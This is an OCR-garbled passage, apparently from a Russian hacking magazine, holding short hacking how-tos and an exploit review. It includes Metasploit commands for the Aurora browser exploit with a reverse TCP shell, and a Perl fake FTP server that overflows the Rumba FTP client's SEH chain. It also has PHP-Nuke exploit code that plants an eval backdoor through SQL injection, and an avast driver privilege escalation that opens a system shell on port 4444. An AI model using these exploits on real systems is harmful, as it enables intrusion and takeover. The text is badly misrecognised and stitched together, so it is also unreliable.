изе ехріоіб /ѵ/іпбхжз /Ьгсжзег /шз10_0 02_аигога 



зек РАУЬОАБ ѵліпскжз/те1:егрге1:ег/геѵегзе_І:ср 

зеС ЬРОЕТ 4444 

зеС ЬНОЗТ 192.168.0.101 

зеС 8ЕѴРОЕТ 80 

зек ІШІРАТН / 

ехрІоШ 

В общем-то, все. При попытке жертвы зайти на доодіе.ги, она попадеткнам, и., 
шелл получен. 



№5 



ЗАДАЧА: ЗАДЕТЕКТИТЬ ИСПОЛЬЗОВА- 
НИЕ 6006І.Е-ХАК0В И СКАНИРОВАНИЕ 
ДИРЕКТОРИЙ ВЕБ-СЕРВЕРА 



РЕШЕНИЕ: 

Ооодіе (и аналогичные поисковики] имеют гигантские базы проиндексиро- 
ванных, закэшированных страниц, очень часто хранящих важную сточки 
зрения безопасности информацию. С помощью специальныхзапросов 
можно достаточно просто выискать сервера суязвимым ПО. Поэтому хакеры 
оченьчасто прибегают к гуглохакам и сканерам для выявления слабых мест в 
защите сервера. 

Длятого, чтобы определить та кие действия, можно создать хон и пот. На 
дЫт.зоигсеГогде.пеГ можно скачать хонипоты, заточенные под гуглохаки, 
плюс почерпнуть информацию по этой теме. Итак, для хонника, выложенного 
надиске: 

1. Разархивируем хонипот; 

2 . Файл сопііід.ріір и файл логов кидаем в папку, недоступную для 
просмотра, то есть не в йСбосз (для АрасЬе) ; 

3. Остальные файлы, кроме геабше . СхР , кидаем куда-нибудь в 
йСбосз; 



4. В соп^ід.рЬр указываем путь до файла логов и тип логов; 

5. Отключаем ЕедізДегОІоЬаІз в рйр.іпі, если оно вообще нужно; 

6 . На какой-нибудь из страниц нашего сайта делаем скрытую для 
глаза ссылку, например, так: <а Ъге^ЪЦЦр : //ехашріе. сот/ 
йопеуроС .рЬр>.</а>, указав цвет точки под цвет фона сайта; 

7 . В іпбех.рйр нашего пота указываем путь до сопііід .рЬр и адрес 
страницы, откуда идет ссылка на наш хонник. 

Все. После этого ждем, пока поисковики проиндексируют наш хонипот. 

Обо всех заходах на хонипот, будьто поисковый паук, сканер или какой-нибудь 
человек, ты сможешьузнать из файла логов. Конечно, вычислить человека ты 
врядли сможешь, но выделить хотя бы какую-то информацию для того, чтобы 
покопаться потом в логахапача и понять общее развитиеатаки — это можно. 
Кроме обычныхтекстовых логов, можно использовать МуБСИилиХМЕРРС, 
что явно повышает возможности реагирования. 

Кстати, если есть желание повысить свой уровень юзания Гугла для поиска 
либо уязвимых сайтов, либо другой информации,™ можешьзаглянуть на 
ЬаскегзГогсЬапГѵ.огд/дЬсІЬ/ . Здесь содержится самая большая база для 
поиска ПО.стандартныхошибокит.д. Почерпнутьопыта также можно, найдя 
книжку «Ооодіе Наскіпд Гог РепеГгаГіоп ТезГегз Ьу ЭдГтпу Еопд». 



Хонипот и логи от него 

ЕВ 



Ы*р:// І 27.0.0 . 1 :вО80/?і[еир1ОсКІ/лсГек .рНр 



РІІе ЧрІоасІ Мападсг 



бнн - тЬе "аоодйе наск” ндоеурос 



Я/е иріоаб Мап адегѵ і? 

|ІЛР1 ■ Ьаигепі Ои<1оМтргоѵіпі Обзор- 

гнщѵмів: 

ГіГнй X у,рѳі . ці ! , \р±$ г рвд , I П г , ИТ , ГіІгп, іір, ГЭГ, , йкй 



ТіГ-« ше Ьтй . 



і ^ I 1 4 л г 



яйтіп ІооЕі : 



100 КВ 



дЬЫпд.гъѵ - Влпкнпт 



Файл Правка Формат Вид Справка 



ГГЬЕиРЬОАОМАЫАФЁЙ, 05-11-2010 04:21:15 

рм.127, 0, 0,1,/^ПеирЪасі/ппсіех. рЬр, ,хехг/Н*т1^44; арр1ісаііоп/хГПпП+ хт' 
іпсЮѵ5А#4 5;1251, ит^&#4 5;8; д=0. 7, 7, дг1р, с!еНаіе,гиі,епе 

00,МО2ІПа/5. 0 (ы1псІС№г; и; міпсіомз; ИТ 5.1; ги; гѵ:1. 9.1. 9) сескс/І 
Рі ге^ох/3 . 5 . 9 ( .МЕТ СІ_К 3. 5, 30729Й#41; , Мо Ее^егѳг; РІЬЕиРЮАОМАМАйЕй, О 
РМ, 127. 0. О.1,/ , Рі1еирІ0асІ/ігс1ех.рЬр,1тітр:/А27. 0. 0.1:8080/^п1еир1 оас|/іпеіех.| 
,арр1ісагіоп/хті ;д»0. 9Й#44; 8, ѵл псіо№&#4 5;1251Й#44; ит , Р&^4 5;8;р"< 

#4 5; из; д-0. 7<5#44:еп; ч-0. 3,кеер-а1іѵе, ЗООрМогШа/З. О 6#40 ;міпсі№У 5; и; ъ 
беек о/2 010031 5 МКА 5.4 (Ыл1сІ 02647ОМ1; РігеГох/З. 5. 9 ( .МЕТ С!_К : 
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ЗАДАЧА: АНОНИМНО СГРАБИТЬЗАГО- 
ЛОВКИ СЕРВИСОВ НАСЕРВЕРЕ 



РЕШЕНИЕ: 

Способов масса, но есть один — грубоватый, но забавный. Для нашей цели мож- 
но воспользоваться плохо настроенными анонимайзерами. Фишка втом, что 
рбр’шные діуре-проксики позволяютпри определенныхусловиях коннектиться 
клюбым портам серверов и, ктомуже, возвращатьзаголовки ответов сервисов. 



Все, что нам требуется, это указать номер порта после имени сервера вида 
ехатрІе.сот:22, где 22 — номер порта. И, если портзакрыт, нам покажутошибку 
«соиІбп’ІсоппесШЬовІ», а если открыт, то заголовок сервиса. Для примера 
можно побаловаться на ѵѵѵѵѵѵ2.сІе.сопп/іпсІех.рЬр . 

В «промышленных масштабах» технология, вероятно, не самая лучшая, но в 
ограниченныхусловиях — очень даже. Болеетого, есть даже концепт-скрипт 
для автоматизации сканирования, который и на диске есть, и скачать можно с 
5еп5еро5і.со.2а/ІаЬ5ЛооІ5/репіе5і/д[уре . Ктомуже, количество общедоступ- 
ных діуре-анонимазиров очень велико, даже пунктикесть в ѲНОВ. 



№7 



РЕШЕНИЕ: 



ЗАДАЧА: УПРОСТИТЬ ПРОЦЕСС НАПИ- 
САНИЯ ЭКСПЛОЙТОВ/ШЕЛЯКОДОВ 



В последних номерах ][ публиковалось много материала о написании 
эксплойтов. Примеры приводились в основном в 0 Цу ОеЬиддег’е и 
большая часть действий производилась вручную. Как ни странно, 
существуют более заточенные вещи с учетом специфики эксплойто- 
пи сания. Для начала — ІттипіІуОеЬиддег. Это, в хорошем смысле, 
клон ОНубЬд версии 1.10. Из основного — приделанная поддержка 
РуіЬоп’а для написания дополнений, коих создано уже очень много. 
Последняя рабочая версия — 1.73 выложена на диске (с 1.74 что-то не 
срослось из-за количества глюков в ней]. Кстати, программа вряд ли 
будет нормально работать, если установить ее или РуШоп в какое- 
нибудь нестандартное место. Теперь к главному. Широкоизвестный в 
узких кругах Реіег Ѵап ЕескЬоіШе ака согеІапсОбЗг выпустил отличный 
плагин к ІттипіІуРЬд — рѵеГтсіасісІг. 

Сам проект достаточно быстро развивается, так что лучше скачать пос- 
леднюю версию с ѵѵѵѵѵѵ.согеіа п.Ье:8800/і псіех. рЬр/зеси гіІѵ/рѵеЕпсІасІ (Иг- 
ру- ітітіипіЩ-сІеЬиддег-рѵсотппагісІ . На диске выложена версия 1 .32. Для 
установки дополнения требуется: 



1 . Скачать рѵеГіпйасісІг .ру ; 

2 . В папке ІішипіДуБЪд'ра кинуть его РуСошшапйз . 



Проверить работоспособность можно через командную строку Іт тип іІуОЬд. 
Вводим Ірѵебпбасібг, и в окне (Иода появится описание плагина. 

Плагин содержит в себе очень много всяких фишек, которые помогают в экс- 
плойтописании и избавляют от рутинныхдел. Приведу несколько примеров. 
Находим джампы на регистры: 



Поиско^зеЕов при 
переполнении бу- 
фера. Для примера 
возьмем статью 
Алексея Синцова 
«Глумимся над 
объектами АсЕѵеХ» 
из апрельского 
номера ][ . Исполь- 
зуем плагин вместо 
написания скрипта 
в Сот Раісіег’е. 

Создаем паттерн в стиле МеіаврІоіЕа. 

Ірѵебіпсіасісіг раД 1 :егп_сгеа 1 :е 500 

Копируем его в аргумент в скрипте запуска уязвимой функции ЭиЬтіпіТоЕхргевв 
агд 1 = "АаОАа 1 А...АдЗАд 4 Ад 5 Ад" 

Запускаем скриптв дебаггере. Смотрим Е5І — 37694136, 5ЕН — 6В41316В. 
Пишем: 

ІрѵеЕіпсІасІсІг раД 1 :егп_оЕГзе 1 : 37694136 500 
ІрѵеГіпсІасІсІг раЦ 1 :егп_о 11 зе 1 : 6 В 41316 В 500 

Е5І начинается с 260 байта, 5ЕН с 304. 

Ищем модули для обхода АЗИН и ОЕР’а: 

ІрѵеГіпсІасІсІг поазіг 




ІрѵеГіпйасІсІг з езр изег 32 .$11 

В результате плагин покажет нам в логе всеітр, саіі, ризб+геі и т.д. для указате- 
ля на вершину стэка для библиотеки ивег32.б11и сохранит итогвдіхЕ 



Плагин выведетсписок сШ’ок, к которым можно привязаться, так какони 
скомпилированы без поддержки рандомизации адресного пространст- 
ва. Как видишь, вещь — стоящая, так что обязательно приглядись к ней 
получше, т 



Находим о^зеЕы использ 



і М. і і..ріоИ:] ра^ъегп... 



Раетегл о# 5ѲО і 

ОаѲОз 1 0а20а30з4 Й а5Оа6Оз7ЙаЗРз9ОЬ0АЬ 1 ОЪ2 АЬЗОЬ4ОЪ5АЬ60Ь7ОЪ8Й ЬЭПсбОс 1 Рс2йоЗПс 



'эісиіэсіпд іп (Мееэ&ріоіг) рэ«егп, . , 



.оок іпд Іог 60 і7 іп ра^еггі оі 5Ѳ0 Ьуіее 

- Ра^етл 60 і 7 ( Ѳк® 7694 і 36 ) #оупсі іп Ие^э^ріоі? раъ^е^п а^ роаі^іоп 26 Ѳ 



1- ВИ--ЯВ «■ Шг в- ИН-іг -» -и « 



аісиіатіпд іп (Неса&ріои) оагсегп... 



.оок іпд ?ог кІОк іп растет оі 5ѲѲ 

- Ра^іЕегп кЮк (бывВ4151вЁ) ?оипсі іп ИеЕа'вРІоі^ оа^ет, аі; ро^іі 
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■іГТі 







ЕХРШІТо 

РЕѴІЕѴѴ 






ВЗЛОМ 



I Алексей Синцов, □ і д И: а I Зесигііу сІоокіе@іпЬох.ги 




ЕХРЮІТЗ 

РЕѴІЕѴѴ 




Г5 


1 






ОБЗОР ЭКСПЛОЙТОВ 

Зтот месяц был не таким плодотворным на качественные эксплойты, 
видимо, погода сделала свое дело - кому охота сидеть за дебаггером, 
когда на улице солнце. Но все же кое-что интересное я для вас подготовил. 
И помните, все это не для того, чтобы нарушать статьи УК РФ, а для того, 
чтобы учится на чужих ошибках и быть в курсе актуальных угроз. 





После выхода из шелла, готовимся к принудительной перезагрузке. 




ВЫХОД ЗА ПРЕДЕЛЫ ДОМАШНЕЙ ДИ- 
РЕКТОРИИ ВѴѴРТР05ЕКѴЕК 



23 

ІМ/А 

*\Л/РТРЦ Зегѵег 3.30 



ѴѴЕТРБ Зегѵег — РТР-сервер для ОС ѴѴіпсІоѵѵз (кстати, не бесплатный]. 
Данная программа содержит очень характерную ошибку. Аналогич- 
ную ошибку находили и в других РТР-серверах оттаких именитых 
производителей как Сізсо, НТО, 5егѵ-0 и многих других. Поэтому не 
лишним будет еще раз обратить внимание на классические просчеты 
программистов. 

МііШі 

Логика РТР-сервиса в том, что у каждого пользователя есть своя ди- 
ректория, и работать он должен в своей рабочей папке. Понятно, что 
это дело должно быть защищено. Программисты — люди не глупые, и 
последовательность фильтруют. 



МКВ /2БОВА 

550 Уои сіо поС Ъ.аѵе гідЪ.к.3 Со сгеаСе СЛаС зиЪсІігесСогу . 



Но невнимательность губит любое хорошее начинание. Так, напри- 
мер, следующий запрос выполнится без проблем: 

МКБ с : \ 2 ІоЬа 

257 "с:\ 2 ІоЬа" сІігесСогу сгеаСесі 



Что ж, очевидно, что кроме относительного пути можно указать и 
абсолютный. Будь внимателен. 



юштюы 



Решения нет. Разветолько не использовать ѴѴРТРО для многопользо- 
вательского доступа по РТР. 




ПЕРЕПОЛНЕНИЕ БУФЕРАВВиМВА 
РТР сиЕічт 



ВИЗ 

ІМ/А 



ІГДМСЦИ 1 

* РитЬа РТР Сііепі 4.2 



Что ж, ошибки бывают не только в платных РТР-серверах, но и в 
платных РТР-клиентах. Уязвимость переполнения буфера — вот что 
хранит в себе этот клиент. 



ЁХРЮІТ 



Эксплойт представляет собой симулятор РТР-сервера, который отвечает 
на некоторые команды и ждет, когда же у него спросятлистинг фай- 
лов. И в момент, когда клиент это сделает, сервер-эксплойт пошлет (в 
пассивном режиме, поэтому если использоватьэксплойтудаленно, 
нужно поменять переменную $разѵір] имя файла, причем очень длин- 
ное. Настолько длинное, что переза п и шетЗЕН -дескриптор и вызовет 
исключительную ситуацию. Естественно, обрабатывая исключительную 
ситуацию, клиент перейдет в ЗЕН-цепочку, вершину который мы переза- 
писали. Так что «обработчиком» исключительной ситуации станет наш 
шелл-код, который запускает калькулятор. Разберем эксплойт: 



изе ѵгагпіпдз; 
изе зкгіск; 
изе ІО : : Зоскек ; 

ту $зоск = ІО: : Зоскек : :ШЕТ->пеѵѵ( ЬосаІРогк => '21' , Ргоко 
=> 1 Сер ' ,;|§ізкеп => ' 1 ’ ) 
ог сііе "Зоскек Ыок Сгеакесі $ ! \п" ; 
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ЛТ5 

VI/ 



І.0ІТ5 

ЕѴѴ 



ЕХРЮІТ5 

КЕѴІЕѴѴ 



ЕХРЮІТ5 

РЕѴІЕѴѴ 



С:ШНРОШ\йуз1етЭ2Ѵстгі п«І ііп пі 



_-ІпЫ 



ѵиѵ 

8Ѵ&Т 

5ѴЕТ 

НЕЬР 81 ТЕ 
ТУРЕ А 
РЙ5У 
1,1 8Т 
ТУРЕ 1 
911 И 

Рдуіодй Лсііѵсгсй сЬсс 

С Пеле СоппйсСегі? 

ЙиАІСІпу Рір СОПРійПІІз: 

ІІ8ЕК ада 

РА 85 даа 

ТУРЕ I 

РУИ 

8ѴЕТ 

8Ѵ5Т 

НЕЬР 5 [ТЕ 
ТУРЕ П 
РАКУ 
ЫЁТ 
ТѴРЕ I 

Рауіоай ЙЕІіикгегі сЬес 



Калькулятор 



Правка Вид Справка 



ОНех ©Оес О 0с * О в « ©Градусы О Радианы О г РЭД ь1 

□ іпѵ О Нур Г Г | Васкзра^е 1 1 СЕ 1 1 С 

В ВШШ В ШШШШ0Ѳ 

В Ѳ00 0 гпввгпвв 

в ВВВ 0 вшшввв 

В0В 0 НПВГНі * II ■ 1В 

I Ра» | /р 1 1 х"2 1 1 I/* | I Рі I А В С О Е Р 



ЕХРЮІТ5 

КЕѴІЕѴѴ 



ЕХРЮІТ5 

ѵі: 



ЕХРЮІТ5 

РЕѴІЕѴѴ 



Подключившись и потыкав кнопочки в РТР-клиенте, я получил... калькулятор. 



# Приветственное сообщение 
ргіпб 

"################################################\п" 

. "# КишЬа ббр Сііепб 4.2 РАЗѴ ВоЕ (ЗЕН) #\п" 

. "# Ву: готЪіебх #\п" 

. " # ЪІзбепіпд оп рогб 21 тл/ібЬ. разѵ рогб об 313 3 7 #\п" 

. "################################################\п" ? 

# ІР для пассивного режима 
ту $разѵір = "127,0,0,1"; 

# Обработка соединения 

ѵЛііІе ( ту $баба = $зоск->ассерб ( ) ) { 

ргіпб "Сііепб Соппесбеб! ѴпАшаібіпд Ебр соттапбз : \п" ; 
ргіпб $баба "220 Оапдзба Вар Мабе Ме Во Іб\г\п" ; 

#Обработка команд — симуляция РТР 
иШе (<$баба>) { 
ргіпб ; 

ргіпб $баба "331 Апопутоиз ассезз а11ошеб\г\п" іб (/ 
БЗЕВ/і) ; 

ргіпб $баба "230-МеІсоте бо N0 М4Ыз 14пб.\г\п230 бГзег 
Іоддеб іп.\г\п" іб (/РАЗЗ/і); 
ргіпб $баба "215 ШГІХТуре: Ъ8 \г\п" іб (/ЗУЗТ/і); 
ргіпб $баба "257 \" /\" із сиггепб бігесбогу . \г\п" іб (/ 
РМВ/і) ; 

ргіпб $баба "200 Туре зеб бо І.\г\п" іб (/ТУРЕ І/і) ; 

ргіпб $баба "200 Туре зеб бо А.\г\п" іб (/ТУРЕ А/і) ; 

ргіпб $баба "214 Зупбах: ЗІТЕ - ( зібе-зресібіс соттапбз) \ 
г\п" 

іб ( /НЕЬР/і) ; 

#Готовимся к передаче... 

ргіпб $баба "227 Епбегіпд Раззіѵе Мобе ( $разѵір , 122 , 105 ) \ 
г\п" 

іб ( / РАЗѴ / і ) ; 



#Запрос листинга директории, вызываем основную функцию 
іб (/ЬІЗТ/і) { 

ргіпб $баба "150 Неге сотез бЬе бігесбогу Іізбіпд . \г\п" 

. "226 Бігесбогу зепб ОК. \г\п" ; 

&зепббаба( '122', '105' ); 

} 

} 

ргіпб "Рауіоаб беііѵегеб сПеск бЬе сііепб !\п"; 

} 

#Основная функция 
зиЬ зепббаба { 

ту $рогб = $_[0] * 25 6 + $_[1] ; 

#Ждем клиента для пересылки 

ту $разѵзоск = ІО: : Зоскеб : : ШЕТ->пем ( ЬосаІРогб => 

$рогб , Ргобо => 'бер', Ьізбеп => '1' ); 

ту $разѵбаба = $разѵзоск->ассерб ( ) ; 

#Первые 13 51 байт — мусор 

ту $зипк = "\х77" х 1351; 

#Перезаписываем ЗЕН-дескриптор адресом 0х100бЕ534 
#по этому адресу — ббріодіе.біі и инструкции, 

#РОР ЕБІ/РОР ЕЗІ/ВЕТЫ 
#которые вернут нас в стек 

ту $зеЬ = раек ( 'V , 0х100бЕ534 ) ;# іосабеб іп ббріодіе. 
611 

#Это инструкция ЛУГР +0x8, 

#так как следующие несколько байтов будут испорчены 
ту $пзеЬ. = " \хеЬ\х0б\х90\х90 " ; 

#шеллкод, на который будет прыжок на пятый ЕГОР из-за преды- 
дущей инструкции: 

ту $порз = " \х9 0" х 50; 
ту $са1сзЬе11 = /* шеллкод */; 
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Закрытие окошек спровоцирует ошибку памяти. 



ту $рау1оас! = $зипк . $пзеЬ . $зеЬ . $порз . $са1сзЬе11; 



ргіпк $разѵсІака 

"-гѵѵ-гѵѵ-г— 1 1176 1176 1060 Арг 23 23 :17 

кезк . $рау1оас!\г\п\г\п" ; 

} 

Эксплойт работает стабильно, правда, понятно, что с Б ЕР он работать 
не будет. 



ЗОШТІОЫ 



Обновить ПО, хотя автор думает, что и новая версия тоже уязвима. Так 
что лучше не использовать его вообще... 




МНОЖЕСТВЕННЫЕ УЯЗВИМОСТИ В 
РНРІМІІКЕ 



РИЗ 

КІ/А 



ТАВСЕТ5 



* РНР-Ыике 7.0 

* РНР-Ыике 8.1 

* РНР-Ыике 8.1 .35 



Еша 

Прошедший месяц оказался для создателей РНР-Ыике не очень при- 
ятным. Что неудивительно, ведь в их детище был найден целый букет 
уязвимостей. Исследователь Майкл Брукс (Місбаеі Вгоокз] опубли- 
ковал эксплойт, который, используя уязвимости І_РІ, ЗОБ-инъекции, 
раскрытия пути, как результат, заливает бэкдор на сервер. Кроме 
того, этот эксплойт не обошел стороной и старые уязвимости, вклю- 
чая ошибку рбрВВ, которая может присутствовать в РНР-Ыике 7.0. 
Программа Брукса написана на РНРи поддерживает использование 
прокси, а в комментариях даны гугль-хак советы, что делает этот 
эксплойт крайне неприятным и может использоваться не только 
скрипт-киддисами, но и червяками. 



ЕХРЮІТ 



Весь код эксплойта занимает полтысячи строк кода, и поэтому цели- 
ком его я тут приводить не буду, лишь интересные кусочки. Разумеет- 
ся, полную версию эксплойта ты всегда сможешь найти на нашем 
диске, но исключительно в целях самопроверки. Ведь РНР-Ыике 



ЕХРЮІТ5 




ЕХРЮІТ5 


РЕѴІЕѴѴ 




РЕѴІЕѴѴ 




ЕХРЫІТ5 

РЕѴІЕѴѴ 



достаточно популярный движок, поэтому стоит провериться. Вдруг 
ты в опасности? Ладно, хватит лирики, приступаем кделу. Эксплойт 
запускается элементарно: 



"с : ХРгодгат Еі1ез\РНР\р1ір. ехе" гшке.рЛр -к 
Ъ.ккр : //<кагдек_зіке> 

Для эксплуатации последней версии РНР-Ыике нужна хоть какая-то 
учетная запись, поэтому эксплойт требует соокіе: 



"с : ХРгодгат Рі1ез\РНР\р1ір . ехе" гшке.рЛр -к 

Ьккр : //<кагдек_зіке> -с изег=МзрЬ2С1рЬд о12] КкУ2Мг:Уз V 

ЬУТс2Ш02Ш04М2І32СѴІОБдуУ2У50ТохМБо6МБотеОзА6МБо6КБ 

А5Ыд== 



В эксплойт встроена собственная функция для работы со слепыми 
инъекциями, кодировки строк и т.д. Так что получается мощный зверь. 
В качестве тестового примера, я попробовал найти инъекцию и по- 
лучить хэш админа с помощью этого эксплойта. Найдя относительно 
заброшенный сайт на этом движке, проверим старую инъекцию, в 
поле геіегег: 

КЕРЕКЕК: ' = (зе1еск ік ( кгие , зіеер ( 1 0 ) , 0 ) кгот пике_ 
аиккюгз Іітік 1))-- 1 

Эксплойт Брукса используетэтууязвимостьдля получения хэша и формиро- 
вания соокіедля дальнейшей заливки шелла через другую инъекцию, уже 
новую, нотребующую прав администратора, а затем открывает бэкдор через 
БРІ-баг. Конечно, если есть регистрация, можно просто зарегистриро- 
ваться и использовать уже другую уязвимость (из арсенала эксплойта] для 
получения учетки админа и заливки бэкдора. Эксплойт обходит встроенные 
фильтры защиты от инъекций, а также правила поумолчанию АррАгтог’а 
для БІЬипіи. 

Код заливки бэкдора: 

ргіпк "Бріоасііпд Ъасксіоог . . . \п" ; 

$гетоке_ракЬ=ас1с1з1аз]тез (ас!с1з1аз]тез ($гетоке_ракЬ. " \\ 
кгопкепсі.ріір" ) ) ; 

$Ъаскс1оог= ' дек_тадіс_<диокез_дрс ( ) ?еѵа1 (зкгірзіазкез ($_ 
СЕТ [ "е" ] ) ) : еѵаі ( $_СЕТ [ "е" ] ) 

$1тккр->розк<іака="с]тпд_иіс1=" . игіепсосіе ( " 1 ипіоп/**/ 
зеіеск " . $зех->с1тагЕпсос1е ( "<?р1ір" $Ъаскс1оог . 
зех->сЪахЕпсос!е ("?>") . 

% ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , ' ' , 1 1 , 1 1 , 1 1 іпко 
оиккііе ' " . $гетоке_ракБи " 1 -- 1" ) ; 

$ге=$1тккр->зепс1 ( $аккаск_иг1 . " /а<ітіп.рЬр?ор=тос1ікуБзег" ) ; 
$1гккр->розк(іака= "хзікепате= " . $ѵа1иез [0] . " &хпикеиг1=" . $ 
ѵаіиез[1] . "&хз1одап=" .$ѵа1иез[2] . "&хзкагкс!аке= " . $ѵа1ие 
з [3] . " &ха<±піпдгар1ііс= " . $ѵа1иез [4] . "&хдкх_сЬк=0&хпике_ 
ес!іког=1&хс1ізр1ау_еггогз=0&ор=заѵедепега1 " ; 
$еггог_герогкіпд=$1іккр->зепс1 ( $аБ1:аск игІ."/асІпп іп.рЬр"] ; 

Функция сбагЕпсобе (] кодирует символы для использования сЬаг() в 
МуЭОБ. Это сделано, чтобы обойти фильтры. Далее эксплойт открывает 
бэкдор: 

$1іккр->розкс1ака= "хБекаи1к_ТІіете= / 
/ктр&хоѵегѵ\пгіке_кЬете=0&ор=заѵекЪ.етез " ; 
$1гккр->зепсЗ ( $аккаск_иг1 . " /а<ітіп.ркір" ) ; 

Заливка трояна в Дтр как раз и позволяетобман^тьАррАгтог. 
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А вот и калькулятор 
изБаіагі. 



БОШТІОЫ 





шоѵ еах, [еЬр+ѵ38_ис] 

Как видно, данные берутся по статическому сдвигу. Прежде чем 
начать перезапись, эксплойт сохраняет по этому сдвигу специаль- 
но подготовленные данные так, чтобы уязвимая функция скушала 
их, и в итоге ЕАХ+0х18 содержал указатель на перезаписываемую 
нами область памяти с адресом функции. Чтобы осуществить запись 
в .баіа, используется І0СТІ_-запрос 0x6266001с. Послетого, как 
данные сохранены, вызывается уже наш ІОСИ 0x62660030, который 
перезаписываетуказатель на функцию, используя предварительно 
сохраненные в .баіа адреса. После этого провоцируется вызов функ- 
ции с перезаписанным указателем — ІОСИ 0x62660020. Кроме того, 
эксплойт должен спровоцировать вызов зузсаіі. Для этого он тупо 
пытается выполнить аутентификацию в системе: 

Ізазі = "есбю бюіа I гипаз /изег : абтіпізбгабог стб.ехе 
> ШЬ" 

1заз2 = "пеб изе \ \ \ \ 12 7 . О . О . 1 /изег : абтіпізбгабог 
безб > ШЬ И 



Решения пока нет, автор предлагает вообще отказаться от использо- 
вания РНР-Ы и ке, мотивируя это тем, что там очень плохо с безопас- 
ностью, и много уязвимостей еще будет найдено. 



оз . зузбет (Ізазі ) 
біте . зіеер ( 1 ) 
оз . зузбет ( 1заз2 ) 




ПОВЫШЕНИЕ 
ПРИВИЛЕГИЙ В АѴА5Т! 



СѴЕ-2008- 1625 



ТАКСЕТ5 



* аѵазб 4.7 РгсЧеззіопаІ ЕбШоп 

* аѵазі: ! 4. 7 Ноте Е6 Шоп 

ІМІЛ 

Матэо Меиелли (МаШео МетеШ) из ОШепзіѵе-ЗесигКу порадовал нас 
отличным эксплойтом для антивируса «аѵазі:!». Уязвимость, найден- 
ная Тобиасом Клейном (Тобіаз Кіеіп], кроется в драйвере антивируса, 
который криво обрабатывает ІОСТЕ-запросы. Так как драйвер — дело 
низкоуровневое, то очевидно, что после эксплуатации уязвимости мы 
получаем права системы. Таким образом, можно поднять свои приви- 
легии вОСспомощью да иного драйвера и уязвимости в нем. 



ЕХРЮІТ 



Итак, для того, чтобы воспользоваться уязвимостью, достаточно 
лишь запустить эксплойт и молиться :]. Ошибка обнаружена в драйве- 
ре ааѵткег4.зуз. Дело в том, что драйвер может обрабатывать ІОСТЕ- 
запросы без проверки валидности данных, а конкретнее, ІОСТЕ 
0x62660030, позволяет копировать любые данные по любому адресу: 

шоѵ есх, 21А6. ; размер 

шоѵ есіі , [еах+18Ь] ; ЕАХ+0х18 — отсюда берем адрес, 

куда копировать 

гер тоѵзб ; копируем в ЕЫ , то есть куда захотим 

Чтобы использовать эту ошибку, был найден указатель на функцию 
со статическим сдвигом от базового адреса. Именно этот адрес и 
перезаписывается на адрес шелл-кода, который передается в буфере 
запроса. Но сначала надо сделатьтак, что бы ЕАХуказывал на наши 
данные. 



В итоге шелл-код выполнится-таки в нужном контексте. Можно под- 
соединяться на порт 4444, чтобы получить системный шелл. 

Формат входных данных в эксплойте: 

#Адрес , где будут лежать данные , 

Сохраненные первым ІОСТЬ-запросом 
геаб_баба_бгот= збгисб . раск ( ' Ь ' , зузЬазе+0х2е04 ) 
#Адрес буфера с шеллкодом, точнее, указатель на МОР'ы 
г0_аббгезз = збгисб . раск ( * Ь ' , зузЬазе+0х2 3 Іа) 
#Формируем первый буфер 

#Этот буфер будет входным параметром для 
#вызова ІОСТЬ 0x6266003 

#Адрес шелл-кода, указатель на МОР, которые идут за ним 
еѵі1_іприб = г0_аббгезз*2 + " \х90 "* 0x102 
#Шелл-код цепочка, вывод в гіпдЗ и открытие шелла на 
4444 порту 

еѵі1_іприб += гіпд0_тідгабе + гіпд0_тзг + гіпдЗ_ 
збадег + гіпдЗ_з!іе11собе 
#Не важно 

еѵі1_іприб += " \х41 " *0х549 

#Указатель на сохраненный в .баба буфер, откуда будут 
читаться 

#данные для этого ІОСТЬ 

еѵі1_іприб += геаб_баба_бгот + " \х42 \х42 \х42 \х42 " 
#Формируем первый буфер, который будет сохранен в 
. баба 

#с помощью первого ІОСТЬ-запроса . 

#Отсюда будут браться данные для второго ІОСТЬ 
#Выравнивание 

због_іприб = " \х43 \х43 \х43 \х43 " 

#Эти данные нужны, чтобы функция, обрабатывающая 
#второй ІОСТЬ ничего не заподозрила 
због_іприб += " \х07 \хАЬ\хЬЕ\хЬ0 " # стр бтлгогб рбг 
[еах] , 0Ь0ЬЕАЬ07Ь 

због_іприб += " \хВА\хЬ0 \хВА\х10 " # стр бтлгогб рбг 

[еах+4 ] , ІОВАЬОВАЬ 

#Выравнивание 

због_іприб += " \х44 \х44 \х44 \х44 " *2 
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Слепая инъекция, хэш админа и его пароль. 



#Указатель для пк ! КеЗеСЕѵепк , который сработает после 
записи 

#главное, чтобы значение по этому указателю было не 
равно единице 

#так что наш указатель подходит 
због_іприб += геаб_баба_^гош 
#Выравнивание 

због_іприб += " \х44 \х44 \х44 \х44 " 

#Со сдвигом в 0x2300 байт от базового адреса 
#лежит указатель на функцию, который надо переписать 
#уязвимая функция обрабатывающая второй ІОСТЬ 
#перепишет память по этому указателю 
#так что укажем на адрес этой функции 

због_іприб += збгисб .раск ( ' Ь ' , зузЬазе+0х23 00 ) + " \ 
х4 5 " *414 



Эксплойт разбивается на потоки и засыпаеттам на минуту. Пока 
идет ожидание, посылаются два ІОСТб-за проса. Первый сохра- 
няет по адресу геаб_сІа1:а_1топп, буфер зІоМприІ. Второй запрос 
отправляет шел л -код и адрес геа сі_сі а 1а_бго т , откуда читать дан- 
ные для обработки функции — еѵіИприб 



беѵ_іосб1 = кегпе132 . БеѵісеІоСопбгоІ (бгіѵег_капб1е1 , 
0хЬ2б6001с, зког_іприк, 

зког_зІ 2 е, зког_оикрик, оик_зІ 2 е, 
Ьугеі: (б^ЕекигпІ ) , Ыопе) 

беѵ_іоск1 = кегпе132 . БеѵісеІоСопкгоІ (бгіѵег_капб1е1 , 
0хЬ2б6003 0 , 

еѵі1_іприк, еѵі1_зіге, еѵі!_ 



оикрик , 

еѵі1_зіге , 

Ьуге^ (бѵѵКекигп2 ) , Ыопе) 



Адальше провоцируем переходе помощью ІОСТб-запроса 0x62660020 
и зузсаб с помощью Ізазз.ехе. Только после того, как шелл-код закон- 
чит работу, Ізазз.ехеумрети отправит за собой всю ОС в перезагрузку. 



50ШТІ0Ы 



Обновление антивируса до версии 4.8 может уберечь от данной 
проблемы. 




ВЫПОЛНЕНИЕ ПРОИЗВОЛЬНОГО 
КОДА В АРРЬЕ 5АРАРІ 



32= 

Ы/А 



ТАРОЕТ5 



* Арріе 5а1а гі <= 4.0.5 

Начнем наш обзор с Обау уязвимости в браузере Эаіагі. Уязвимость 
